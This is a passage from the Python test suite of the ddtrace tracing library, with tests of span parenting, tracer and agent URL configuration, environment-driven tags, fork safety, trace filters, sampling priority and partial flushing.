with self.start_span("web.worker", child_of=parent) as child:
assert self.tracer.current_span() is None
parent.assert_matches(
name="web.request",
parent_id=None,
_parent=None,
tracer=self.tracer,
)
child.assert_matches(
name="web.worker",
parent_id=parent.span_id,
_parent=parent,
tracer=self.tracer,
)
def test_start_child_span_attributes(self):
# it should create a child Span with parent's attributes
with self.start_span("web.request", service="web", resource="/", span_type="http") as parent:
with self.start_span("web.worker", child_of=parent) as child:
child.assert_matches(name="web.worker", service="web")
def test_start_child_from_context(self):
# it should create a child span with a populated Context
with self.start_span("web.request") as root:
with self.start_span("web.worker", child_of=root.context) as child:
pass
child.assert_matches(
name="web.worker",
parent_id=root.span_id,
trace_id=root.trace_id,
_parent=None,
tracer=self.tracer,
)
def test_adding_services(self):
assert self.tracer._services == set()
with self.start_span("root", service="one") as root:
assert self.tracer._services == set(["one"])
with self.start_span("child", service="two", child_of=root):
pass
assert self.tracer._services == set(["one", "two"])
def test_configure_dogstatsd_url_host_port(self):
tracer = Tracer()
tracer.configure(dogstatsd_url="foo:1234")
assert tracer.writer.dogstatsd.host == "foo"
assert tracer.writer.dogstatsd.port == 1234
tracer = Tracer()
writer = AgentWriter("http://localhost:8126")
tracer.configure(writer=writer, dogstatsd_url="foo:1234")
assert tracer.writer.dogstatsd.host == "foo"
assert tracer.writer.dogstatsd.port == 1234
def test_configure_dogstatsd_url_socket(self):
tracer = Tracer()
tracer.configure(dogstatsd_url="unix:///foo.sock")
assert tracer.writer.dogstatsd.host is None
assert tracer.writer.dogstatsd.port is None
assert tracer.writer.dogstatsd.socket_path == "/foo.sock"
tracer = Tracer()
writer = AgentWriter("http://localhost:8126")
tracer.configure(writer=writer, dogstatsd_url="unix:///foo.sock")
assert tracer.writer.dogstatsd.host is None
assert tracer.writer.dogstatsd.port is None
assert tracer.writer.dogstatsd.socket_path == "/foo.sock"
def test_tracer_url():
t = ddtrace.Tracer()
assert t.writer.agent_url == "http://localhost:8126"
t = ddtrace.Tracer(url="http://foobar:12")
assert t.writer.agent_url == "http://foobar:12"
t = ddtrace.Tracer(url="unix:///foobar")
assert t.writer.agent_url == "unix:///foobar"
t = ddtrace.Tracer(url="http://localhost")
assert t.writer.agent_url == "http://localhost"
t = ddtrace.Tracer(url="https://localhost")
assert t.writer.agent_url == "https://localhost"
with pytest.raises(ValueError) as e:
ddtrace.Tracer(url="foo://foobar:12")
assert (
str(e.value) == "Unsupported protocol 'foo' in Agent URL 'foo://foobar:12'. Must be one of: http, https, unix"
)
def test_tracer_shutdown_no_timeout():
t = ddtrace.Tracer()
writer = mock.Mock(wraps=t.writer)
t.writer = writer
# The writer thread does not start until the first write.
t.shutdown()
assert t.writer.stop.called
assert not t.writer.join.called
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
# Do a write to start the writer.
with t.trace("something"):
pass
(w,) = ws
assert issubclass(w.category, DeprecationWarning)
assert (
str(w.message) == "Tracing with a tracer that has been shut down is being deprecated. "
"A new tracer should be created for generating new traces in version '1.0.0'"
)
with t.trace("something"):
pass
t.shutdown()
t.writer.stop.assert_has_calls(
[
mock.call(timeout=None),
mock.call(timeout=None),
]
)
def test_tracer_configure_writer_stop_unstarted():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Stop should be called when replacing the writer.
t.configure(hostname="localhost", port=8126)
assert orig_writer.stop.called
def test_tracer_configure_writer_stop_started():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Do a write to start the writer
with t.trace("something"):
pass
t.configure(hostname="localhost", port=8126)
orig_writer.stop.assert_called_once_with()
def test_tracer_shutdown_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
with t.trace("something"):
pass
t.shutdown(timeout=2)
t.writer.stop.assert_called_once_with(timeout=2)
def test_tracer_dogstatsd_url():
t = ddtrace.Tracer()
assert t.writer.dogstatsd.host == "localhost"
assert t.writer.dogstatsd.port == 8125
t = ddtrace.Tracer(dogstatsd_url="foobar:12")
assert t.writer.dogstatsd.host == "foobar"
assert t.writer.dogstatsd.port == 12
t = ddtrace.Tracer(dogstatsd_url="udp://foobar:12")
assert t.writer.dogstatsd.host == "foobar"
assert t.writer.dogstatsd.port == 12
t = ddtrace.Tracer(dogstatsd_url="/var/run/statsd.sock")
assert t.writer.dogstatsd.socket_path == "/var/run/statsd.sock"
t = ddtrace.Tracer(dogstatsd_url="unix:///var/run/statsd.sock")
assert t.writer.dogstatsd.socket_path == "/var/run/statsd.sock"
with pytest.raises(ValueError) as e:
t = ddtrace.Tracer(dogstatsd_url="foo://foobar:12")
assert str(e) == "Unknown url format for `foo://foobar:12`"
def test_tracer_fork():
t = ddtrace.Tracer()
original_pid = t._pid
original_writer = t.writer
@contextlib.contextmanager
def capture_failures(errors):
try:
yield
except AssertionError as e:
errors.put(e)
def task(t, errors):
# Start a new span to trigger process checking
with t.trace("test", service="test"):
# Assert we recreated the writer and have a new queue
with capture_failures(errors):
assert t._pid != original_pid
assert t.writer is not original_writer
assert t.writer._encoder is not original_writer._encoder
# Assert the trace got written into the correct queue
assert len(original_writer._encoder) == 0
assert len(t.writer._encoder) == 1
# Assert tracer in a new process correctly recreates the writer
errors = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(t, errors))
try:
p.start()
finally:
p.join(timeout=2)
assert errors.empty(), errors.get()
# Ensure writing into the tracer in this process still works as expected
with t.trace("test", service="test"):
assert t._pid == original_pid
assert t.writer == original_writer
assert t.writer._encoder == original_writer._encoder
# Assert the trace got written into the correct queue
assert len(original_writer._encoder) == 1
assert len(t.writer._encoder) == 1
def test_tracer_with_version():
t = ddtrace.Tracer()
# With global `config.version` defined
with override_global_config(dict(version="1.2.3")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "1.2.3"
# override manually
span.set_tag(VERSION_KEY, "4.5.6")
assert span.get_tag(VERSION_KEY) == "4.5.6"
# With no `config.version` defined
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) is None
# explicitly set in the span
span.set_tag(VERSION_KEY, "1.2.3")
assert span.get_tag(VERSION_KEY) == "1.2.3"
# With global tags set
t.set_tags({VERSION_KEY: "tags.version"})
with override_global_config(dict(version="config.version")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "config.version"
def test_tracer_with_env():
t = ddtrace.Tracer()
# With global `config.env` defined
with override_global_config(dict(env="prod")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "prod"
# override manually
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With no `config.env` defined
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) is None
# explicitly set in the span
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With global tags set
t.set_tags({ENV_KEY: "tags.env"})
with override_global_config(dict(env="config.env")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "config.env"
class EnvTracerTestCase(TracerTestCase):
"""Tracer test cases requiring environment variables."""
@run_in_subprocess(env_overrides=dict(DATADOG_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DATADOG_SERVICE_NAME(self):
"""
When DATADOG_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DD_SERVICE_NAME(self):
"""
When DD_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env(self):
with self.start_span("") as span:
pass
span.assert_matches(
service="mysvc",
)
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env_global_config(self):
# Global config should have higher precedence than the environment variable
with self.override_global_config(dict(service="overridesvc")):
with self.start_span("") as span:
pass
span.assert_matches(
service="overridesvc",
)
@run_in_subprocess(env_overrides=dict(DD_VERSION="0.1.2"))
def test_version_no_global_service(self):
# Version should be set if no service name is present
with self.trace("") as span:
span.assert_matches(
meta={
VERSION_KEY: "0.1.2",
},
)
# The version will not be tagged if the service is not globally
# configured.
with self.trace("root", service="rootsvc") as root:
assert VERSION_KEY not in root.meta
with self.trace("child") as span:
assert VERSION_KEY not in span.meta
@run_in_subprocess(env_overrides=dict(DD_SERVICE="django", DD_VERSION="0.1.2"))
def test_version_service(self):
# Fleshed out example of service and version tagging
# Our app is called django, we provide DD_SERVICE=django and DD_VERSION=0.1.2
with self.trace("django.request") as root:
# Root span should be tagged
assert root.service == "django"
assert VERSION_KEY in root.meta and root.meta[VERSION_KEY] == "0.1.2"
# Child spans should be tagged
with self.trace("") as child1:
assert child1.service == "django"
assert VERSION_KEY in child1.meta and child1.meta[VERSION_KEY] == "0.1.2"
# Version should not be applied to spans of a service that isn't user-defined
with self.trace("mysql.query", service="mysql") as span:
assert VERSION_KEY not in span.meta
# Child should also not have a version
with self.trace("") as child2:
assert child2.service == "mysql"
assert VERSION_KEY not in child2.meta
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
def test_detect_agentless_env_with_lambda(self):
assert _in_aws_lambda()
assert not _has_aws_lambda_agent_extension()
tracer = Tracer()
assert isinstance(tracer.writer, LogWriter)
tracer.configure(enabled=True)
assert isinstance(tracer.writer, LogWriter)
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
def test_detect_agent_config_with_lambda_extension(self):
def mock_os_path_exists(path):
return path == "/opt/extensions/datadog-agent"
assert _in_aws_lambda()
with mock.patch("os.path.exists", side_effect=mock_os_path_exists):
assert _has_aws_lambda_agent_extension()
tracer = Tracer()
assert isinstance(tracer.writer, AgentWriter)
assert tracer.writer._sync_mode
tracer.configure(enabled=False)
assert isinstance(tracer.writer, AgentWriter)
assert tracer.writer._sync_mode
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func", DD_AGENT_HOST="localhost"))
def test_detect_agent_config(self):
tracer = Tracer()
assert isinstance(tracer.writer, AgentWriter)
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2"))
def test_dd_tags(self):
assert self.tracer.tags["key1"] == "value1"
assert self.tracer.tags["key2"] == "value2"
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2,key3"))
def test_dd_tags_invalid(self):
assert "key1" in self.tracer.tags
assert "key2" in self.tracer.tags
assert "key3" not in self.tracer.tags
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "mysvc"
assert s.get_tag("env") == "myenv"
assert s.get_tag("version") == "myvers"
@run_in_subprocess(
env_overrides=dict(
DD_TAGS="service:s,env:e,version:v",
DD_ENV="env",
DD_SERVICE="svc",
DD_VERSION="0.123",
)
)
def test_tags_from_DD_TAGS_precedence(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "svc"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS_override(self):
t = ddtrace.Tracer()
ddtrace.config.env = "env"
ddtrace.config.service = "service"
ddtrace.config.version = "0.123"
with t.trace("test") as s:
assert s.service == "service"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
def test_tracer_set_runtime_tags():
t = ddtrace.Tracer()
with t.start_span("foobar") as span:
pass
assert len(span.get_tag("runtime-id"))
t2 = ddtrace.Tracer()
with t2.start_span("foobaz") as span2:
pass
assert span.get_tag("runtime-id") == span2.get_tag("runtime-id")
def test_tracer_runtime_tags_fork():
tracer = ddtrace.Tracer()
def task(tracer, q):
span = tracer.start_span("foobaz")
q.put(span.get_tag("runtime-id"))
span.finish()
span = tracer.start_span("foobar")
span.finish()
q = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children_tag = q.get()
assert children_tag != span.get_tag("runtime-id")
def test_tracer_runtime_tags_cross_execution(tracer):
ctx = Context(trace_id=12, span_id=21)
tracer.context_provider.activate(ctx)
with tracer.trace("span") as span:
pass
assert span.get_tag("runtime-id") is not None
assert span.get_metric(system.PID) is not None
def test_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
span = t.start_span("hello")
assert span == result["span"]
span.finish()
def test_deregister_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
t.deregister_on_start_span(store_span)
with t.start_span("hello"):
pass
assert result == {}
def test_enable(monkeypatch):
t1 = ddtrace.Tracer()
assert t1.enabled
monkeypatch.setenv("DD_TRACE_ENABLED", "false")
t2 = ddtrace.Tracer()
assert not t2.enabled
def test_runtime_id_parent_only():
tracer = ddtrace.Tracer()
# Parent spans should have runtime-id
s = tracer.trace("test")
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
# Child spans should not
s2 = tracer.trace("test2")
assert s2.get_tag("runtime-id") is None
s2.finish()
s.finish()
# Parent spans should have runtime-id
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
def test_runtime_id_fork():
tracer = ddtrace.Tracer()
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
pid = os.fork()
if pid == 0:
# child
s = tracer.trace("test")
s.finish()
rtid_child = s.get_tag("runtime-id")
assert isinstance(rtid_child, six.string_types)
assert rtid != rtid_child
os._exit(12)
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
def test_multiple_tracer_ctx():
t1 = ddtrace.Tracer()
t2 = ddtrace.Tracer()
with t1.trace("") as s1:
with t2.trace("") as s2:
pass
assert s2.parent_id == s1.span_id
assert s2.trace_id == s1.trace_id
def test_filters(tracer, test_spans):
class FilterAll(object):
def process_trace(self, trace):
return None
tracer.configure(
settings={
"FILTERS": [FilterAll()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 0
class FilterMutate(object):
def __init__(self, key, value):
self.key = key
self.value = value
def process_trace(self, trace):
for s in trace:
s.set_tag(self.key, self.value)
return trace
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
s1, s2 = spans
assert s1.get_tag("boop") == "beep"
assert s2.get_tag("boop") == "beep"
# Test multiple filters
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterMutate("mats", "sundin")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
assert s.get_tag("mats") == "sundin"
class FilterBroken(object):
def process_trace(self, trace):
_ = 1 / 0
tracer.configure(
settings={
"FILTERS": [FilterBroken()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterBroken()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
def test_early_exit(tracer, test_spans):
s1 = tracer.trace("1")
s2 = tracer.trace("2")
s1.finish()
tracer.log = mock.MagicMock(wraps=tracer.log)
s2.finish()
calls = [
mock.call("span %r closing after its parent %r, this is an error when not using async", s2, s1),
]
tracer.log.debug.assert_has_calls(calls)
assert s1.parent_id is None
assert s2.parent_id is s1.span_id
traces = test_spans.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 2
s1 = tracer.trace("1-1")
s1.finish()
assert s1.parent_id is None
s1 = tracer.trace("1-2")
s1.finish()
assert s1.parent_id is None
class TestPartialFlush(TracerTestCase):
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="5")
)
def test_partial_flush(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 5
assert [s.name for s in traces[0]] == ["child0", "child1", "child2", "child3", "child4"]
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="1")
)
def test_partial_flush_too_many(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 5
for t in traces:
assert len(t) == 1
assert [t[0].name for t in traces] == ["child0", "child1", "child2", "child3", "child4"]
for t in traces:
assert t[0].parent_id == root.span_id
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="6")
)
def test_partial_flush_too_few(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 0
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert [s.name for s in traces[0]] == ["root", "child0", "child1", "child2", "child3", "child4"]
def test_partial_flush_configure(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=5)
self.test_partial_flush()
def test_partial_flush_too_many_configure(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=1)
self.test_partial_flush_too_many()
def test_partial_flush_too_few_configure(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=6)
self.test_partial_flush_too_few()
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="false", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="6")
)
def test_partial_flush_configure_precedence(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=5)
self.test_partial_flush()
def test_unicode_config_vals():
t = ddtrace.Tracer()
with override_global_config(dict(version=u"😇", env=u"😇")):
with t.trace("1"):
pass
t.shutdown()
def test_ctx(tracer, test_spans):
with tracer.trace("test") as s1:
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s1.span_id
with tracer.trace("test2") as s2:
assert tracer.current_span() == s2
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s2.span_id
with tracer.trace("test3") as s3:
assert tracer.current_span() == s3
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s3.span_id
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s2.span_id
with tracer.trace("test4") as s4:
assert tracer.current_span() == s4
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s4.span_id
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.current_span() is None
assert tracer.current_root_span() is None
assert s1.parent_id is None
assert s2.parent_id == s1.span_id
assert s3.parent_id == s2.span_id
assert s4.parent_id == s1.span_id
assert s1.trace_id == s2.trace_id == s3.trace_id == s4.trace_id
assert s1.metrics[SAMPLING_PRIORITY_KEY] == 1
assert SAMPLING_PRIORITY_KEY not in s2.metrics
assert ORIGIN_KEY not in s1.meta
t = test_spans.pop_traces()
assert len(t) == 1
assert len(t[0]) == 4
_s1, _s2, _s3, _s4 = t[0]
assert s1 == _s1
assert s2 == _s2
assert s3 == _s3
assert s4 == _s4
with tracer.trace("s") as s:
assert s.parent_id is None
assert s.trace_id != s1.trace_id
def test_multithreaded(tracer, test_spans):
def target():
with tracer.trace("s1"):
with tracer.trace("s2"):
pass
with tracer.trace("s3"):
pass
for i in range(1000):
ts = [threading.Thread(target=target) for _ in range(10)]
for t in ts:
t.start()
for t in ts:
t.join()
traces = test_spans.pop_traces()
assert len(traces) == 10
for trace in traces:
assert len(trace) == 3
def test_ctx_distributed(tracer, test_spans):
# Test activating an invalid context.
ctx = Context(span_id=None, trace_id=None)
tracer.context_provider.activate(ctx)
assert tracer.current_span() is None
with tracer.trace("test") as s1:
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s1.span_id
assert s1.parent_id is None
trace = test_spans.pop_traces()
assert len(trace) == 1
# Test activating a valid context.
ctx = Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
tracer.context_provider.activate(ctx)
assert tracer.current_span() is None
assert (
tracer.current_trace_context()
== tracer.context_provider.active()
== Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
)
with tracer.trace("test2") as s2:
assert tracer.current_span() == s2
assert tracer.current_root_span() == s2
assert tracer.current_trace_context().trace_id == s2.trace_id == 4321
assert tracer.current_trace_context().span_id == s2.span_id
assert s2.parent_id == 1234
trace = test_spans.pop_traces()
assert len(trace) == 1
assert s2.metrics[SAMPLING_PRIORITY_KEY] == 2
assert s2.meta[ORIGIN_KEY] == "somewhere"
def test_manual_keep(tracer, test_spans):
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
def test_manual_keep_then_drop(tracer, test_spans):
# Test changing the value before finish.
with tracer.trace("asdf") as root:
with tracer.trace("child") as child:
child.set_tag(MANUAL_KEEP_KEY)
root.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
def test_manual_drop(tracer, test_spans):
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_enabled(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=True)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) == "test-hostname"
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_disabled(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_default(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
def test_non_active_span(tracer, test_spans):
with tracer.start_span("test", activate=False):
assert tracer.current_span() is None
assert tracer.current_root_span() is None
assert tracer.current_span() is None
assert tracer.current_root_span() is None
traces = test_spans.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 1
with tracer.start_span("test1", activate=False):
with tracer.start_span("test2", activate=False):
assert tracer.current_span() is None
assert tracer.current_root_span() is None
assert tracer.current_span() is None
assert tracer.current_root_span() is None
traces = test_spans.pop_traces()
assert len(traces) == 2
with tracer.start_span("active", activate=True) as active:
with tracer.start_span("non active", child_of=active, activate=False):
assert tracer.context_provider.active() is active
assert tracer.current_root_span() is active
assert tracer.context_provider.active() is active
assert tracer.current_root_span() is active
traces = test_spans.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 2
def test_service_mapping():
@contextlib.contextmanager
def override_service_mapping(service_mapping):
with override_env(dict(DD_SERVICE_MAPPING=service_mapping)):
assert ddtrace.config.service_mapping == {}
ddtrace.config.service_mapping = Config().service_mapping
yield
ddtrace.config.service_mapping = {}
# Test single mapping
with override_service_mapping("foo:bar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
assert span.service == "bar"
# Test multiple mappings
with override_service_mapping("foo:bar,sna:fu"), ddtrace.Tracer().trace("renaming", service="sna") as span:
assert span.service == "fu"
# Test colliding mappings
with override_service_mapping("foo:bar,foo:foobar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
assert span.service == "foobar"
# Test invalid service mapping
with override_service_mapping("foo;bar,sna:fu"):
with ddtrace.Tracer().trace("passthru", service="foo") as _:
assert _.service == "foo"
with ddtrace.Tracer().trace("renaming", "sna") as _:
assert _.service == "fu"
def test_configure_url_partial():
tracer = ddtrace.Tracer()
tracer.configure(hostname="abc")
assert tracer.writer.agent_url == "http://abc:8126"
tracer.configure(port=123)
assert tracer.writer.agent_url == "http://abc:123"
tracer = ddtrace.Tracer(url="http://abc")
assert tracer.writer.agent_url == "http://abc"
tracer.configure(port=123)
assert tracer.writer.agent_url == "http://abc:123"
tracer.configure(port=431)
assert tracer.writer.agent_url == "http://abc:431"
def test_bad_agent_url(monkeypatch):
with pytest.raises(ValueError):
Tracer(url="bad://localhost:8126")
monkeypatch.setenv("DD_TRACE_AGENT_URL", "bad://localhost:1234")
with pytest.raises(ValueError) as e:
Tracer()
assert (
str(e.value)
== "Unsupported protocol 'bad' in Agent URL 'bad://localhost:1234'. Must be one of: http, https, unix"
)
monkeypatch.setenv("DD_TRACE_AGENT_URL", "unix://")
with pytest.raises(ValueError) as e:
Tracer()
assert str(e.value) == "Invalid file path in Agent URL 'unix://'"
monkeypatch.setenv("DD_TRACE_AGENT_URL", "http://")
with pytest.raises(ValueError) as e:
Tracer()
assert str(e.value) == "Invalid hostname in Agent URL 'http://'"
def test_context_priority(tracer, test_spans):
"""Assigning a sampling_priority should not affect if the trace is sent to the agent"""
for p in [priority.USER_REJECT, priority.AUTO_REJECT, priority.AUTO_KEEP, priority.USER_KEEP, None, 999]:
with tracer.trace("span_%s" % p) as span:
span.context.sampling_priority = p
# Spans should always be written regardless of sampling priority since
# the agent needs to know the sampling decision.
spans = test_spans.pop()
assert len(spans) == 1, "trace should be sampled"
if p in [priority.USER_REJECT, priority.AUTO_REJECT, priority.AUTO_KEEP, priority.USER_KEEP]:
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] == p
def test_spans_sampled_out(tracer, test_spans):
with tracer.trace("root") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = False
spans = test_spans.pop()
assert len(spans) == 0
def test_spans_sampled_one(tracer, test_spans):
with tracer.trace("root") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = True
spans = test_spans.pop()
assert len(spans) == 3
def test_spans_sampled_all(tracer, test_spans):
with tracer.trace("root") as span:
span.sampled = True
with tracer.trace("child") as span:
span.sampled = True
with tracer.trace("child") as span:
span.sampled = True
spans = test_spans.pop()
assert len(spans) == 3
def test_closing_other_context_spans_single_span(tracer, test_spans):
"""
Ensure that a span created in one thread can be finished in another without
breaking the active span management.
"""
def _target(span):
assert tracer.current_span() is None
span.finish()
assert tracer.current_span() is None
span = tracer.trace("main thread")
assert tracer.current_span() is span
t1 = threading.Thread(target=_target, args=(span,))
t1.start()
t1.join()
assert tracer.current_span() is None
spans = test_spans.pop()
assert len(spans) == 1
def test_closing_other_context_spans_multi_spans(tracer, test_spans):
"""
Ensure that spans created in one thread can be finished in another without
breaking the active span management.
"""
def _target(span):
assert tracer.current_span() is None
span.finish()
assert tracer.current_span() is None
root = tracer.trace("root span")
span = tracer.trace("child span")
assert tracer.current_span() is span
t1 = threading.Thread(target=_target, args=(span,))
t1.start()
t1.join()
assert tracer.current_span() is root
root.finish()
spans = test_spans.pop()
assert len(spans) == 2
def test_fork_manual_span_same_context(tracer):
span = tracer.trace("test")
pid = os.fork()
if pid == 0:
child = tracer.start_span("child", child_of=span)
assert child.parent_id == span.span_id
assert child._parent is None
# No more current span strong reference to avoid memory leaks.
assert tracer.current_span() is None
child.finish()
os._exit(12)
span.finish()
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
def test_fork_manual_span_different_contexts(tracer):
span = tracer.start_span("test")
